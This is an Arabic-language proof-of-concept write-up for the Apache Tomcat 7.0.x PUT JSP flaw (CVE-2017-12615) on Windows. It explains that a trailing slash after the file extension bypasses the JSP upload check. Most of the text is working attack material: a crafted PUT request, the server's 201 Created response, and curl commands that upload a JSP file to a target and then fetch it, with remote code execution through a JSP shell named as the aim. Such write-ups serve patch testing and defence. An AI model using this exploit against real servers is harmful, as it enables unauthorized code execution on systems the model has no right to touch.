
استغلال POC لثغرة PUT JSP في Apache Tomcat 7.0.x (CVE-2017-12615)
استغلال POC لأباتشي تومكات 7.0.0 إلى 7.0.79 على ويندوز؛ ثغرة CVE-2017-12615 PUT JSP.
حسب التصميم، لا يُسمح لك برفع ملفات JSP عبر طريقة PUT على خوادم أباتشي تومكات. من المحتمل أن يكون هذا إجراءً أمنيًا لمنع المهاجم من رفع شيل JSP والحصول على تنفيذ تعليمات برمجية عن بُعد على الخادم. ومع ذلك، نظرًا لعدم كفاية الفحوصات، يمكن للمهاجم الحصول على تنفيذ تعليمات برمجية عن بُعد على خوادم تومكات 7.0.{0 إلى 79} التي تم تمكين PUT عليها عن طريق طلب طريقة PUT على خادم تومكات باستخدام طلب HTTP مصمم خصيصًا. لكن بجدية، خاص؟ من فضلك.
عن طريق إضافة حرف '/' خلف امتداد اسم الملف، يمكن تجاوز فحص امتداد الملف. هذا كل شيء. لذا، ليس بهذه الخصوصية في الواقع.
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write executed.</h3></body></html>"); %>
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
curl http://target-host-or-ip-address:port/test.jsp